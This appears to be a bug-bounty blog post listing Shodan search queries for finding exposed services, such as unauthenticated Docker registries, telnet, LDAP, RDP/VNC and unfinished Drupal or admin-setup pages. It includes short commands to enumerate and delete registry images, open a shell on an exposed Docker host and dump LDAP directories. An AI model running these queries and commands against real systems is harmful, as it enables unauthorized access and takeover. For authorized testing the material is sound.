1. DJANGO DROPLET
http.html:"Your Django Droplet"

2. ONEINSTACK
http.html:"Congratulations, OneinStack installed successfully"


3. GITEA INSTALLATION
http.html:"Installation - Gitea: Git with a cup of tea"
http.title:"Installation - Gitea: Git with a cup of tea"


4. DIRECTORY BROWSING MODE
http.title:"directory browsing mode"

5. CANNOT RESOLVE
http.title:"Cannot resolve"
http.html:"Cannot resolve"




6. Exposed Docker Registry API Without Authentication
Some are intentionally public; for the others, test whether the privilege to modify is available.
"Docker Registry HTTP API" -"UNAUTHORIZED"

#API VERSION CHECK
curl -X GET http://ip:port/v2/
#LIST REPOSITORIES
curl -X GET http://ip:port/v2/_catalog
#TAGS LIST
GET /v2/repository_name_here/tags/list
#DIGEST LIST
GET /v2/<name>/manifests/<tag>
#DELETE REPOSITORY
DELETE /v2/<name>/manifests/<reference>
#PUSHING AN IMAGE
POST /v2/<name>/blobs/uploads/
🪲Exploitation Detailed Reference
Docker Registries and their secrets
Never leave your docker registry publicly exposed! Recently, I have been exploring dockers a lot in search of… (logicbomb.medium.com)
🪲Exploitation to run cryptocurrency-mining malware https://blog.trendmicro.co.jp/archives/20566
🐞Spawn Interactive Shell
docker -H <host>:<port> ps
docker -H <host>:<port> exec -it <container name> /bin/bash
Docker Hacking: From Shodan to Root
Exploiting Docker Publically exposed API (medium.com)
🐞Pentesting Docker Registry by HackTricks
5000 – Pentesting Docker Registry | HackTricks
A storage and distribution system known as a Docker registry is in place for Docker images that are named and may come… (book.hacktricks.xyz)
📕HackerOne Public Reports
U.S. Dept Of Defense disclosed on HackerOne: Exposed Docker…
Summary: The docker registry at https://██████ has no authentication in place and is therefore exposed to the public… (hackerone.com)
Semmle disclosed on HackerOne: Docker Registry HTTP API v2 exposed…
Summary: Docker Registry HTTP API v2 is exposed in HTTP without authentication. An attacker can use it to dump your… (hackerone.com)

7. Unauthenticated TELNET
"root@" port:23 -login -password -name -Session
Some of them are honeypots 🪤


8. LDAP
An LDAP (Lightweight Directory Access Protocol) anonymous null bind leads to the extraction of sensitive credentials from Active Directory (AD).
"LDAP:"
"LDAP:" "dc="
"LDAP:" "dc=domain,dc=com"
"LDAP:" "NamingContexts"
"LDAP:" "dc=gov"
"LDAP:" "dc=org"

sudo nmap --script=ldap-search.nse X.X.X.X -p 389,636 -Pn
ldapsearch -x -H ldap://<server_ip> -b "DC=domain,DC=com"


9. Unauthenticated RDP/VNC
"authentication disabled" "RFB 003.008"
remote desktop "port:3389"

10. MONGO EXPRESS
"Set-Cookie: mongo-express=" "200 OK"


11. RANSOMWARE COMPROMISED SYSTEMS
Find systems already compromised by threat actors by matching on interesting keywords.
"ransomware"



12. DEFAULT PASSWORD
The possibilities for matching juicy keywords are endless. Also try keywords that may lead directly to easy vulnerability exploitation.
default password

13. GUEST LOGIN
After testing the login with default credentials and weak credentials, we can look for a Guest Login feature and test which features are available behind it. Proxy everything and do the testing manually using Burp Suite.
http.html:"Login as Guest"



14. REGISTRATION ENDPOINT
Most automation tools rely on unauthenticated mass testing, but if we find registration endpoints, we can dive deeper into areas that other hunters don't like to hunt manually.
http.html:"Register"

15. CREATE ADMIN ACCOUNT
In most cases, we can directly create the admin account and start our exploitation because the endpoint is unprotected (Broken Access Control).
http.html:"create admin account"




16. CREATE ADMIN
We are trying to narrow down to pages where these keywords are present in the HTML DOM.
http.html:"admin setup"
http.html:"create admin"


17. DRUPAL TAKEOVER
Install Drupal > Login as Administrator > Takeover the site.
🔴Severity: Critical/High
In some cases, however, there are still restrictions in place.
http.html:"Set up database" http.html:"Drupal"
http.title:"Select an installation profile"
Execptional Bug in 5 minutes at @intigriti
About myself:
I am Mahfujur Rahman, and my username is mahfujwhh. I am a Bug bounty Hunter. (medium.com)

18. SSRF & RCE TESTING ENDPOINT
http.html:"Convert and Upload"

19. SSRF TESTING ENDPOINT
http.html:"Enter URL"



20. SSO Login (Single Sign-On)
http.html:"SSO Login"
http.html:"Login with SSO"
http.html:"Single Sign-On"


Stay tuned for more Shodan dorking articles